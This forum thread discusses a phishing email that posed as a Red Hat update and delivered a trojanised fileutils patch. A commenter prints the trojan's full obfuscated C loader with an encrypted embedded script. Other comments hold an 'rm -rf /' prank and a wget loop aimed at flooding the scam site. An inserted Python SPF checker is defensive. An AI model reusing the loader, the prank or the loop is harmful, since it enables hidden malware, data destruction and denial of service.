It seems to me that most people using any version of Linux will not fall victim to these sorts of things. I would expect something like this to work for the majority of windows users, but as the audience of Linux is mostly tech-savvy, I can't see this becoming a problem. The problem is going to be when larger groups of desktop users make the jump to Linux. What can be done to prevent this from happening in the future? What failsafes can be built into Linux to prevent people with less than average pc skills from destroying their systems?

Re:Stupid Tricks? (1, Informative)

stratjakt (596332) | more than 9 years ago | (#10617152)

I wouldn't say the audience of linux is tech-savvy, they just think they are.

The stupidest people I've ever met are the ones who think they know everything. Your average 14 year old who installs gentoo and now considers himself a giant in the world of computing fits the bill. I've suggested rm -rf / (logged in as root, of course) as a solution to email routing problems, and they do it.

They'd easily fall for this. More easily, I'd say, than the average clueless user, since many of them are slightly technophobic. You just have to tickle their egos. Put some big technical-sounding words and acronyms in the email, and they'll suck it down.

Surprisingly (4, Funny)

Mentorix (620009) | more than 9 years ago | (#10617079)

Running untrusted code can result in system compromise.

Everyone checks the gpg signatures right?

Re:Surprisingly (1)

squarefish (561836) | more than 9 years ago | (#10617135)

I wouldn't be so sure that everyone even has the slightest idea of how to begin in checking the gpg signature

Re:Surprisingly (1)

bcs_metacon.ca (656767) | more than 9 years ago | (#10617180)

You don't have to. If you use a package installer like up2date, yum, or apt, they will complain loudly if a package isn't appropriately signed. This all happens without the user knowing anything about it. And unlike Windows, there's no inviting "Trust this software? Yes/No" dialog -- turning off trust is a little more complicated than that, and requires administrator access.

For what it's worth... (1)

Theatetus (521747) | more than 9 years ago | (#10617234)

To be honest, Microsoft's "trust this software?" dialog is pretty good: hard to fake and lets you view the signing certificate if you want to. The "Always trust software from these people" option kind of bugs me but I guess it's not much different from setting a key's trust level in GPG.

Re:Surprisingly (1)

Rykky (533501) | more than 9 years ago | (#10617230)

Well.. RedHat distros have you import their GPG key into RPM the first time you run up2date. Then RPM takes care of the signature checking for us and cries bloody murder when a package isn't signed or is signed incorrectly.

Slashdot (0)

Anonymous Coward | more than 9 years ago | (#10617090)

I would not worry, this page will prob be hit by the slashdot effect and be taken down just by that....

Use the /. effect for good (3, Funny)

JamesTRexx (675890) | more than 9 years ago | (#10617093)

Now if each time when someone tries this sort of thing gets their server posted here on slashdot, we could actually do something good with the slashdot effect and put their server up in smoke before much damage is done. :-D

Re:Use the /. effect for good (0, Redundant)

sfire (175775) | more than 9 years ago | (#10617138)

And how much you want to bet that the server was hacked, and the real owner of the server is going to have to foot the bill?

It's Yahoo hosting (1)

Theatetus (521747) | more than 9 years ago | (#10617227)

Not exactly the box most likely to get pwned by somebody.

Re:Use the /. effect for good (1)

joeljkp (254783) | more than 9 years ago | (#10617209)

$ while true; do wget http://fedora-redhat.com/index.htm; rm index.htm; sleep 1; done

Cry havoc! (1)

LittleLebowskiUrbanA (619114) | more than 9 years ago | (#10617094)

and let slip the trolls of Slashdot! Let's see how long before this guy gets hacked and his personal IP address/physical address are posted on here.

You can almost feel sorry for the guy :)

Re:Cry havoc! (1, Redundant)

sfire (175775) | more than 9 years ago | (#10617122)

And how much you want to bet that the server was already hacked, and the real owner of the server is going to have to foot the bill?

Re:Cry havoc! (1)

LittleLebowskiUrbanA (619114) | more than 9 years ago | (#10617170)

Yeah, this will be an interesting write up sooner or later. First of its kind for OSS if I'm not mistaken. Guess we're finally Enterprise level Microsoft now.

Source code! (1)

pac1085 (801480) | more than 9 years ago | (#10617095)

Well, whatever it is, it comes with its source code! inst.c is in the tarball, check it out.

Re:Source code! (1, Insightful)

Anonymous Coward | more than 9 years ago | (#10617136)

Inst.c is just a compiled shell script. The actual code is in fileutils-patch.bin.

Must be some mistake (-1, Troll)

stratjakt (596332) | more than 9 years ago | (#10617105)

There is absolutely no malware of any sort for linux. Linux is magical and can't run any code that does bad things.

Re:Must be some mistake (0)

Anonymous Coward | more than 9 years ago | (#10617134)

You're an idiot.

Re:Must be some mistake (1)

Nikker (749551) | more than 9 years ago | (#10617140)

But did they allow you to download the source ???

Confidence (2, Insightful)

FiReaNGeL (312636) | more than 9 years ago | (#10617111)

OK, we all know no Linux Guru will ever fall for this kind of stupid trick.

But imagine a world where Linux overwhelms Microsoft as the #1 desktop OS. Millions of Moms and Pops everywhere, using Linux. Who will they trust for their "updates"? I know for sure lots of them would fall for this particular trick, and it's one of the first times we see this. Lots of distros, lots of sources, lots of patches, major confusion.

Question (as I don't use Linux yet): Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it's essential for further desktop market share increase.

Re:Confidence (1)

bcs_metacon.ca (656767) | more than 9 years ago | (#10617161)

Yes, of course they do. Red Hat Enterprise has Red Hat Network, SUSE has YOU, and Fedora Core has GPG signed distro channels.

When I set up a system for a "non-technical user", I set up the patches to be automatic (they go through a rigorous QA assessment -- I've never seen a "bad" patch in a final version of Fedora Core). I also don't give the NTU the root password, or install development utils -- so there's no way this phish/trojan could affect one of the systems I administer.

Re:Confidence (1)

FiReaNGeL (312636) | more than 9 years ago | (#10617179)

I hate to show my ignorance, but this is an excellent thing ;) And...

In Soviet Russia, SUSE has YOU! :P

Re:Confidence (1)

Mentorix (620009) | more than 9 years ago | (#10617211)

Yes, redhat has a webbased update page, but you can do it semi-automatically as well now. Doesn't work as good as with some other distro's in my experience.

Debian and Gentoo have built software management policies right into their core system. Just click on update and let the machine take care of itself. All annoying dependency stuff gets taken care of by itself and security updates can be scheduled to run automatically.

Looking at the files.. (1, Informative)

schmiddy (599730) | more than 9 years ago | (#10617121)

First of all, this site should be shut down immediately. I'm not sure exactly what laws apply, but they're definitely guilty of spamming and spreading trojans, that should be enough in and of itself to notify their hosting provider.

I downloaded that tar file off the site to take a look at it. It contains a makefile, an inst.c, and a binary file "fileutils-patch.bin".

Looking at inst.c, I'm too lazy to figure out all the code on my own, but it's well commented and the functions are properly named, proper indentation, etc. (I suspect they probably just ripped off some open source programs, modified the code a bit, and turned it into a trojan.)

I think there's at least stuff in there to crack your password file since I see:
key(pswd, sizeof(pswd_t));
in there. I'm guessing the binary patch file does some nasty stuff as well.

P.S. I just looked at the binary file through strings. It is indeed a rip-off of some GPL program, since the following text is included at the beginning of the file:

fileutils-4.1.9-11
=u9F!
5928f30d339e2c8002986120e6abd2e7d4e61921
=u9F!
fileutils
4.1.9
The GNU versions of common file management utilities.
The fileutils package includes a number of GNU versions of common and popular file management utilities. Fileutils includes the following tools: chgrp (changes a file's group ownership), chown (changes a file's ownership), chmod (changes a file's permissions), cp (copies files), dd (copies and converts files), df (shows a filesystem's disk usage), dir (gives a brief directory listing), dircolors (the setup program for the color version of the ls command), du (shows disk usage), install (copies files and sets permissions), ln (creates file links), ls (lists directory contents), mkdir (creates directories), mkfifo (creates FIFOs or named pipes), mknod (creates special files), mv (renames files), rm (removes/deletes files), rmdir (removes empty directories), sync (synchronizes memory and disk), touch (changes file timestamps), and vdir (provides long directory listings). daffy.perf.redhat.com
Red Hat Linux
Red Hat, Inc.
Red Hat, Inc.
Applications/File
linux
i386

The amazing thing is (1)

antifoidulus (807088) | more than 9 years ago | (#10617131)

They seem to be able to master phishing and obfuscated code, but they just can't get the English language:
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only.

Trademark infringement... (0)

}InFuZeD{ (52430) | more than 9 years ago | (#10617149)

I'd like to see Redhat sue the owner of the domain for trademark infringement ;)

Obviously it was a malacisious use of the domain, and I think the verdict is pretty much secured, so it would be fun.

Re:Trademark infringement... (2, Funny)

}InFuZeD{ (52430) | more than 9 years ago | (#10617192)

Ok, that was a horrible misspelling of malicious :|

PHEW! (5, Funny)

big daddy kane (731748) | more than 9 years ago | (#10617150)

I'm sure glad I'm using windows!

Re:PHEW! (0, Funny)

Anonymous Coward | more than 9 years ago | (#10617185)

Sooner or later, one of these is gonna compile under Cygwin...

does it or not ? (2, Insightful)

Matt_Joyce (816842) | more than 9 years ago | (#10617153)

It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code."

Either it is malicious or not.
Don't they know ?

If it does; explain what it does and how to mitigate the damage.
If it does not; let people know so emotional energy can be used elsewhere.

What's the definition of 'malicious code' anyway?
Presumably any code you don't want running is malicious.
Creating a temp file would be a malicious use of disk space, etc.

Most users, sure (1)

JustOK (667959) | more than 9 years ago | (#10617155)

Sure, I'm hoping that > 99.99999% of current users will spot this within seconds. Yet, I thought I heard the idea was to get more people using linux. That would include a number of people who get infected in dumb ways on MS. Unless their machines are totally locked down (or adminned by the "linite"), it's gonna happen. Maybe it happening now, and proper defenses being designed, will be a good thing.

Spelling/Grammar? (2, Informative)

hereschenes (813329) | more than 9 years ago | (#10617156)

"Anybody running RedHat and Fedora are strongly adviced to apply this patch!"

Why can't scammers ever spell? Someone send them a copy of Strong Bad's "Rhythm 'n' Grammar", quick!

Re:Spelling/Grammar? (1)

ScrewMaster (602015) | more than 9 years ago | (#10617240)

Probably because most of them are in Nigeria.

Linux - Where the malware comes with the source (5, Funny)

cranos (592602) | more than 9 years ago | (#10617160)

Dammit why does Linux have to be so complicated, I mean damn you have to compile your own viruses and everything!!!!

Re:Linux - Where the malware comes with the source (1)

Chrispy1000000 the 2 (624021) | more than 9 years ago | (#10617220)

Hey, just be thankful that you *might* not know what you are compiling. You require *real* user intervention to use that viral sig that pops up from time to time.

Use SPF to protect yourself from phishing (5, Informative)

taubz (322102) | more than 9 years ago | (#10617177)

If your mail client checked From: addresses against SPF records in DNS, you'd know immediately this was a hoax. Redhat.com fortunately publishes SPF records and -- score one for SPF -- they can be used to identify with 100% accuracy that the mail is not legitimate.

How can you get your mail client to check SPF records automatically? Download the Thunderbird SPF Extension [for.net] .

(Disclosure: I wrote the plugin. :) )
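As an added example (not taubz's extension and not code from the page), here is a small Python checker that does what the post describes: it evaluates the From: domain's SPF record against the IP the mail arrived from, and separately flags link hosts in the body that carry the sender's brand without being its subdomains. The SPF records are constructed in memory (the redhat.com record below is made up, not the real one); a real checker would resolve the domain's TXT record. Only the ip4, ip6, include and all mechanisms are implemented, which is enough for this case.

```python
import ipaddress
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed, in-memory stand-in for DNS TXT lookups (assumption: this is NOT
# redhat.com's real record; a real checker queries DNS for the sender domain).
SPF_RECORDS = {
    "redhat.com": "v=spf1 ip4:192.0.2.0/24 include:_spf.mailer.example -all",
    "_spf.mailer.example": "v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 -all",
}

RESULT_FOR_QUALIFIER = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(domain, client_ip, records=SPF_RECORDS, depth=0):
    """Evaluate the sending host against the domain's SPF record.

    Supports the ip4, ip6, include and all mechanisms with their qualifiers;
    a, mx, ptr and exists (which need further DNS lookups) are skipped here.
    Returns one of: pass, fail, softfail, neutral, none, permerror.
    """
    if depth > 10:  # SPF caps include recursion; refuse runaway records
        return "permerror"
    record = records.get(domain.lower())
    if record is None or not record.startswith("v=spf1"):
        return "none"
    ip = ipaddress.ip_address(client_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        mechanism, _, argument = term.partition(":")
        mechanism = mechanism.lower()
        if mechanism == "all":
            matched = True
        elif mechanism in ("ip4", "ip6"):
            network = ipaddress.ip_network(argument, strict=False)
            matched = ip.version == network.version and ip in network
        elif mechanism == "include":
            matched = check_spf(argument, client_ip, records, depth + 1) == "pass"
        else:
            continue  # unsupported mechanism: treated as "no match" in this subset
        if matched:
            return RESULT_FOR_QUALIFIER[qualifier]
    return "neutral"  # nothing matched and the record has no "all" term


# Hosts introduced by a scheme or a leading "www." (keeps file names like
# fileutils-1.0.6.patch.tar.gz from being mistaken for domains).
LINK_HOST = re.compile(r"(?:https?://|www\.)([A-Za-z0-9.-]+)")


def assess_message(raw_message, client_ip, records=SPF_RECORDS):
    """SPF result for the From: domain plus look-alike link hosts in the body."""
    msg = message_from_string(raw_message)
    _, from_addr = parseaddr(msg.get("From", ""))
    from_domain = from_addr.rpartition("@")[2].lower()
    brand = from_domain.split(".")[0]  # "redhat" for redhat.com
    link_domains = set()
    for host in LINK_HOST.findall(msg.get_payload()):
        host = host.lower().rstrip(".")
        if host.startswith("www."):
            host = host[4:]
        link_domains.add(host)
    # A host that is neither the sender domain nor one of its subdomains but
    # still contains the brand name is the classic look-alike pattern.
    suspicious = sorted(
        d for d in link_domains
        if d != from_domain and not d.endswith("." + from_domain) and brand in d
    )
    return {
        "from_domain": from_domain,
        "spf": check_spf(from_domain, client_ip, records),
        "suspicious_link_domains": suspicious,
    }


# Constructed sample mirroring the scam quoted in the thread; the sending host
# 203.0.113.5 lies outside the (constructed) redhat.com record above.
SAMPLE_EMAIL = """\
From: RedHat Security Team <security@redhat.com>
To: user@example.org
Subject: Critical fileutils update

First download the patch: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com
"""

if __name__ == "__main__":
    print(assess_message(SAMPLE_EMAIL, "203.0.113.5"))
```

Run as a script it reports the sample as spf "fail" with fedora-redhat.com as the only suspicious link host. Note that SPF proper is evaluated on the envelope sender (MAIL FROM) and HELO identity rather than the header From:, so a production filter should apply the same evaluation to those identities; checking the header, as the post suggests, is what catches a forged display address like this one.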

Re:Use SPF to protect yourself from phishing (0)

Anonymous Coward | more than 9 years ago | (#10617214)

But how do we know that it isn't a trojan? (Is an unsigned, third party extension, not on official update site)

Coding 0, Grammar 0. (5, Funny)

monoi (811392) | more than 9 years ago | (#10617182)

Anybody running RedHat and Fedora are strongly adviced to apply this patch!

But I am running SUSE! Am I adviced in similar fashion? Perhaps I too should applying patch lest SUSE found vulnerability also? Thankyou to www.fedora-redhat.com for adviced me in this helpful manner against remote attackers!

Coming soon... (1)

cuteseal (794590) | more than 9 years ago | (#10617195)

*In an ominous voice over*

"This fall... a malicious trojan / virus / spyware... coming soon to a linux terminal near you..."

mkdir and ls? (1)

mrfibbi (695943) | more than 9 years ago | (#10617196)

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.
Because we all know how dangerous and root-related those commands can be. For christ's sake. Can't they at least come up with some sort of sudo-related vulnerability that at least sounds plausible?

Here is the code to inst.c (1)

quantumraptor (818569) | more than 9 years ago | (#10617206)

#if 0
shc Version 3.7, Generic Script Compiler
Copyright (c) 1994-2003 Francisco Rosales <frosal@fi.upm.es>

shc -v -r -T -f redhat
#endif

static long date = 0;
static char mail[] = "Please contact your provider";
static int relax = 1;
typedef char pswd_t[433];
static char pswd[] =
"\112\326\126\023\345\101\227\242\127\260\241\033\143\344\132\161"
"\071\320\301\103\056\023\044\053\136\365\273\307\014\033\346\213"
"\012\176\145\076\305\057\222\140\013\163\022\014\266\152\133\056"
"\055\055\117\325\077\140\120\025\356\256\310\170\017\153\162\107"
"\225\266\313\200\345\263\017\174\224\255\001\005\012\151\271\322"
"\356\260\322\136\126\347\347\026\162\253\362\224\350\150\071\147"
"\347\202\366\114\104\134\277\102\343\302\275\107\144\271\053\002"
"\337\045\271\361\045\310\070\327\241\313\227\271\163\003\046\026"
"\232\241\345\152\151\375\036\365\323\246\050\227\325\140\023\126"
"\020\363\136\323\032\333\176\021\016\325\274\114\304\144\171\232"
"\356\176\170\257\340\133\311\172\132\363\307\323\312\221\237\373"
"\000\204\246\324\174\215\166\237\276\376\044\320\373\345\034\107"
"\355\013\234\346\316\133\072\157\104\317\250\006\063\232\321\355"
"\121\202\217\343\207\370\115\072\150\310\231\213\151\155\133\166"
"\237\207\324\236\014\107\335\271\306\022\022\257\061\133\062\355"
"\213\173\122\100\272\266\257\332\355\302\117\062\074\063\275\145"
"\073\056\143\151\031\303\210\151\331\353\262\246\336\143\257\210"
"\060\321\040\143\142\001\363\261\302\164\052\125\375\160\115\252"
"\354\264\302\050\360\266\132\047\365\053\101\027\051\052\165\223"
"\371\316\001\011\027\314\255\273\123\373\356\330\035\074\212\313"
"\343\225\026\114\201\154\250\212\064\140\023\114\074\226\306\021"
"\236\244\330\037\001\222\135\211\045\047\357\177\000\045\024\366"
"\250\215\335\116\171\170\026\335\273\106\037\225\366\104\103\162"
"\045\032\371\270\031\067\212\016\113\213\355\103\010\063\164\323"
"\354\115\214\262\241\111\230\102\106\172\327\260\047\301\146\261"
"\016\241\274\062\024\143\121\117\047\337\141\321\311\000\114\134"
"\132\053\236\061\232\035\250\154\016\165\060\141\202\212\047\175"
"\352\366\271\064\335\347\045\356\276\220\027";
typedef char shll_t[8];
static char shll[] =
"\027\227\104\215\344\060\226\051\353\036\220\073\114\040\167\126"
"\012\043\340\355";
typedef char inlo_t[3];
static char inlo[] =
"\036\173\055\223\266\275\074\222\066\027";
typedef char xecc_t[15];
static char xecc[] =
"\136\317\002\017\371\053\007\345\165\066\036\162\266\047\013\261"
"\363\204";
typedef char lsto_t[1];
static char lsto[] =
"\347\047\233\033\245\043\257\234\252\240\037\262";
#define TEXT_chk1 "KTZE4lIVf7i4BR"
typedef char chk1_t[15];
static char chk1[] =
"\176\150\322\244\275\145\026\000\230\311\274\166\150\124\334\163"
"\053\372\006\215";
typedef char opts_t[1];
static char opts[] =
"\331\051\317\253\133\114\076\242\237\252\144\142";
typedef char text_t[1199];
static char text[] =
"\302\214\330\267\274\114\354\115\323\353\153\135\350\215\100\341"
"\364\315\074\102\276\122\042\345\157\237\003\103\246\341\370\334"
"\354\221\335\166\270\142\306\045\355\173\260\100\343\073\063\146"
"\272\171\102\300\274\105\250\172\206\216\255\220\343\272\014\043"
"\005\057\144\113\057\373\202\222\234\002\306\356\312\144\300\000"
"\075\031\301\120\303\072\027\226\275\353\247\316\314\216\216\020"
"\336\171\201\144\221\147\005\234\000\315\131\366\044\361\370\107"
"\035\047\377\306\162\105\371\365\173\116\116\060\247\262\374\207"
"\101\025\340\324\170\363\223\213\105\102\130\167\143\272\341\202"
"\300\054\002\347\171\075\302\156\267\174\071\103\174\172\140\326"
"\372\101\071\103\227\326\005\236\151\002\050\343\003\265\311\102"
"\132\333\320\366\323\322\112\326\055\242\073\334\171\357\115\343"
"\305\111\031\130\153\027\033\266\125\246\265\264\246\042\106\253"
"\241\042\333\261\145\205\337\167\175\217\160\026\023\364\077\374"
"\327\354\217\270\343\140\123\326\162\002\041\266\120\212\154\253"
"\207\157\222\144\144\055\221\302\367\037\256\357\147\166\223\266"
"\004\075\221\132\351\347\215\034\017\170\314\341\206\171\374\205"
"\344\050\170\353\072\001\247\044\372\304\047\231\006\153\352\135"
"\135\006\034\223\012\133\132\074\140\211\130\106\072\272\311\132"
"\131\271\012\062\277\262\332\334\026\205\133\227\373\036\063\031"
"\121\244\027\357\024\032\143\366\065\102\001\057\202\206\271\331"
"\203\020\230\064\330\026\117\160\331\361\372\151\163\076\126\260"
"\125\373\333\052\123\170\022\031\121\060\203\314\367\161\266\056"
"\227\172\244\065\372\022\275\255\377\277\247\061\077\020\142\307"
"\012\157\131\327\024\130\161\213\027\302\105\004\240\264\213\307"
"\151\025\001\164\055\350\106\056\252\133\205\116\254\047\325\174"
"\347\141\017\276\166\241\356\154\213\015\135\206\321\315\004\346"
"\205\331\254\167\107\003\331\125\121\065\175\051\016\333\340\370"
"\306\201\166\103\315\366\226\141\307\221\101\372\027\352\362\146"
"\234\022\222\101\345\343\055\364\160\161\346\025\171\040\064\176"
"\131\317\325\376\015\175\027\152\315\321\274\152\330\121\300\342"
"\120\357\357\267\175\064\335\307\074\177\121\142\175\352\173\110"
"\053\021\116\172\363\124\143\226\051\360\132\035\160\256\252\140"
"\134\216\100\024\226\264\167\125\214\051\146\144\163\240\167\260"
"\350\142\173\155\354\156\302\162\202\227\366\312\271\352\063\273"
"\370\077\174\235\110\302\151\362\116\203\330\033\343\264\071\345"
"\013\265\244\241\355\351\145\377\255\154\032\070\025\176\374\313"
"\374\310\130\057\271\132\311\246\024\323\057\172\363\316\225\302"
"\216\230\217\103\217\354\324\144\133\201\254\337\170\260\310\251"
"\154\122\123\050\044\107\216\160\306\105\022\370\055\043\211\241"
"\363\356\162\172\015\246\210\266\131\237\065\205\263\037\217\270"
"\153\246\032\255\271\217\301\232\353\056\255\235\154\047\353\167"
"\066\362\333\066\153\174\214\352\367\223\077\322\343\234\354\252"
"\102\372\071\126\374\137\165\060\047\140\032\040\267\044\053\100"
"\342\152\227\160\306\054\025\325\133\074\166\246\014\146\000\001"
"\221\073\055\061\267\146\150\076\132\364\101\146\113\336\305\377"
"\133\357\233\324\346\032\052\310\322\156\245\165\340\021\303\153"
"\060\053\153\137\234\226\023\132\134\024\156\121\053\221\125\227"
"\205\241\304\002\231\303\322\271\142\111\275\222\073\346\073\320"
"\055\267\026\333\267\136\253\352\346\060\034\076\045\032\374\222"
"\375\352\237\203\315\014\351\123\306\331\175\254\370\130\036\343"
"\071\336\273\221\165\260\053\250\003\331\046\317\121\176\053\342"
"\106\323\106\316\117\362\206\346\212\322\165\356\133\145\026\377"
"\263\263\307\255\216\137\352\251\122\241\156\121\033\074\365\256"
"\315\335\231\137\040\030\201\302\104\017\005\012\233\217\266\377"
"\043\113\203\055\064\121\234\266\222\210\254\011\303\113\350\341"
"\200\307\352\130\040\310\142\107\315\141\005\225\061\010\162\373"
"\013\344\220\122\205\224\016\311\220\240\343\260\226\130\215\160"
"\241\120\117\321\147\324\147\317\207\136\117\033\002\206\347\340"
"\122\117\157\274\060\022\071\250\140\130\307\201\317\100\146\256"
"\126\135\302\253\250\022\250\274\221\051\172\270\265\156\003\107"
"\035\337\153\160\126\335\263\217\143\233\000\214\345\246\354\303"
"\050\040\361\331\060\020\354\007\322\047\104\124\030\303\156\035"
"\250\222\242\001\236\104\061\246\132\272\224\365\003\065\165\363"
"\210\042\362\123\222\274\124\343\024\124\153\056\023\110\031\340"
"\023\035\214\057\143\276\374\211\270\156\057\304\015\311\317\032"
"\073\156\151\170\006\272\265\134\040\125\204\000\002\033\273\074"
"\053\007\211\131\205\300\212\136\275\134\233\226\210\161\101\107"
"\215\253\220\174\242\323\025\007\246\267\046\371\245\326\265\221"
"\157\130\027\103\017\320\077\027\361\317\135\156\125\042\067\154"
"\271\336\152\162\102\224\240\307\316\174\111\174\104\312\111\075"
"\065\215\320\004\073\353\151\154\077\365\131\050\216\003\233\027"
"\045\323\162\175\043\212\121\114\315\363\026\214\053\232\345\315"
"\011\202\002\306\307\240\054\103\225\063\302\230\332\047\177\225"
"\211\056\354\376\215\332\206\337\124\375\135\207\033\344\130\233"
"\331\051\202\216\147";
#define TEXT_chk2 "O0AFdy47Rzu8"
typedef char chk2_t[13];
static char chk2[] =
"\162\047\213\323\345\143\301\204\175\267\026\301\110\344\301\113"
"\026\111\043\027\120\103\262\203\176\107\337";
typedef char hide_t[4096];

#define DEBUGEXEC 0 /* Define as 1 to debug execvp calls */
#define TRACEABLE 1 /* Define as 1 to enable ptrace the executable */

/* rtc.c */

#include <sys/stat.h>
#include <sys/types.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/**
* 'Alleged RC4' Source Code picked up from the news.
* From: allen@gateway.grumman.com (John L. Allen)
* Newsgroups: comp.lang.c
* Subject: Shrink this C code for fame and fun
* Date: 21 May 1996 10:49:37 -0400
*/

static unsigned char state[256], indx, jndx;

/*
* Reset rc4 state.
*/
void state_0(void)
{
indx = jndx = 0;
do {
state[indx] = indx;
} while (++indx);
}

/*
* Set key. Can be used more than once.
*/
void key(char * str, int len)
{
unsigned char tmp, * ptr = (unsigned char *)str;
while (len > 0) {
do {
tmp = state[indx];
jndx += tmp;
jndx += ptr[(int)indx % len];
state[indx] = state[jndx];
state[jndx] = tmp;
} while (++indx);
ptr += 256;
len -= 256;
}
}

/*
* Crypt data.
*/
void rc4(char * str, int len)
{
unsigned char tmp, * ptr = (unsigned char *)str;
jndx = 0;
while (len > 0) {
indx++;
tmp = state[indx];
jndx += tmp;
state[indx] = state[jndx];
state[jndx] = tmp;
tmp += state[indx];
*ptr ^= state[tmp];
ptr++;
len--;
}
}

/*
* Key with file invariants.
*/
int key_with_file(char * file)
{
struct stat statf[1];
struct stat control[1];

if (stat(file, statf) < 0)
return -1;

/* Turn on stable fields */
memset(control, 0, sizeof(control));
control->st_ino = statf->st_ino;
control->st_dev = statf->st_dev;
control->st_rdev = statf->st_rdev;
control->st_uid = statf->st_uid;
control->st_gid = statf->st_gid;
control->st_size = statf->st_size;
control->st_mtime = statf->st_mtime;
control->st_ctime = statf->st_ctime;
key((char *)control, sizeof(control));
return 0;
}

#if DEBUGEXEC
void debugexec(char * shll, int argc, char ** argv)
{
int i;
fprintf(stderr, "shll=%s\n", shll ? shll : "<null>");
fprintf(stderr, "argc=%d\n", argc);
if (!argv) {
fprintf(stderr, "argv=<null>\n");
} else {
for (i = 0; i <= argc ; i++)
fprintf(stderr, "argv[%d]=%.60s\n", i, argv[i] ? argv[i] : "<null>");
}
}
#endif /* DEBUGEXEC */

void rmarg(char ** argv, char * arg)
{
for (; argv && *argv && *argv != arg; argv++);
for (; argv && *argv; argv++)
*argv = argv[1];
}

int chkenv(int argc)
{
char buff[512];
unsigned mask, m;
int l, a, c;
char * string;
extern char ** environ;

mask = (unsigned)chkenv;
mask ^= (unsigned)getpid() * ~mask;
sprintf(buff, "x%x", mask);
string = getenv(buff);
#if DEBUGEXEC
fprintf(stderr, "getenv(%s)=%s\n", buff, string ? string : "<null>");
#endif
l = strlen(buff);
if (!string) {
/* 1st */
sprintf(&buff[l], "=%u %d", mask, argc);
putenv(strdup(buff));
return 0;
}
c = sscanf(string, "%u %d%c", &m, &a, buff);
if (c == 2 && m == mask) {
/* 3rd */
rmarg(environ, &string[-l - 1]);
return 1 + (argc - a);
}
return -1;
}

#if !TRACEABLE

#define _LINUX_SOURCE_COMPAT
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>

void untraceable(char * argv0)
{
char proc[80];
int pid, mine;

switch(pid = vfork()) {
case 0:
pid = getppid();
/* For problematic SunOS ptrace */
sprintf(proc, "/proc/%d/as", (int)pid);
close(0);
mine = !open(proc, O_RDWR|O_EXCL);
if (!mine && errno != EBUSY)
mine = !ptrace(PTRACE_ATTACH, pid, 0, 0);
if (mine) {
kill(pid, SIGCONT);
} else {
fprintf(stderr, "%s is being traced!\n", argv0);
kill(pid, SIGKILL);
}
_exit(mine);
case -1:
break;
default:
if (pid == waitpid(pid, 0, 0))
return;
}
perror(argv0);
_exit(1);
}
#endif /* !TRACEABLE */

char * xsh(int argc, char ** argv)
{
char buff[512];
char * scrpt;
int ret, i, j;
char ** varg;

state_0();
key(pswd, sizeof(pswd_t));
rc4(shll, sizeof(shll_t));
rc4(inlo, sizeof(inlo_t));
rc4(xecc, sizeof(xecc_t));
rc4(lsto, sizeof(lsto_t));
rc4(chk1, sizeof(chk1_t));
if (strcmp(TEXT_chk1, chk1))
return "location has changed!";
ret = chkenv(argc);
if (ret < 0)
return "abnormal behavior!";
varg = (char **)calloc(argc + 10, sizeof(char *));
if (!varg)
return 0;
if (ret) {
if (!relax && key_with_file(shll))
return shll;
rc4(opts, sizeof(opts_t));
rc4(text, sizeof(text_t));
rc4(chk2, sizeof(chk2_t));
if (strcmp(TEXT_chk2, chk2))
return "shell has changed!";
if (sizeof(text_t) < sizeof(hide_t)) {
/* Prepend spaces til a sizeof(hide_t) script size. */
scrpt = malloc(sizeof(hide_t));
if (!scrpt)
return 0;
memset(scrpt, (int) ' ', sizeof(hide_t));
memcpy(&scrpt[sizeof(hide_t) - sizeof(text_t)], text, sizeof(text_t));
} else {
scrpt = text; /* Script text */
}
} else { /* Reexecute */
if (*xecc) {
sprintf(buff, xecc, argv[0]);
scrpt = buff;
} else {
scrpt = argv[0];
}
}
j = 0;
varg[j++] = argv[0]; /* My own name at execution */
if (ret && *opts)
varg[j++] = opts; /* Options on 1st line of code */
if (*inlo)
varg[j++] = inlo; /* Option introducing inline code */
varg[j++] = scrpt; /* The script itself */
if (*lsto)
varg[j++] = lsto; /* Option meaning last option */
i = (ret > 1) ? ret : 0; /* Args numbering correction */
while (i < argc)
varg[j++] = argv[i++]; /* Main run-time arguments */
varg[j] = 0; /* NULL terminated array */
#if DEBUGEXEC
debugexec(shll, j, varg);
#endif
execvp(shll, varg);
return shll;
}

int main(int argc, char ** argv)
{
#if DEBUGEXEC
debugexec("main", argc, argv);
#endif
#if !TRACEABLE
untraceable(argv[0]);
#endif
if (date && (date < (long)time(NULL))) {
fprintf(stderr, "%s has expired!\n", argv[0]);
fprintf(stderr, "%s\n", mail);
} else {
argv[1] = xsh(argc, argv);
fprintf(stderr, "%s%s%s: %s\n", argv[0],
errno ? ": " : "",
errno ? strerror(errno) : "",
argv[1] ? argv[1] : "<null>"
);
}
return 1;
}

Good going team "redhat"! (1)

null-sRc (593143) | more than 9 years ago | (#10617231)

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.

anyone stupid enough to believe that deserves what they get... mkdir, and ls, yeah ok LOL WTF ROTFL!!!LMAOO

This is a critical-critical update

and they say windows has problems with critical vulnerabilities!! look at this! critical-critical! even more critical than just plain critical! phew i feel safer on windows now. never heard of a critical critical on winupdate ;)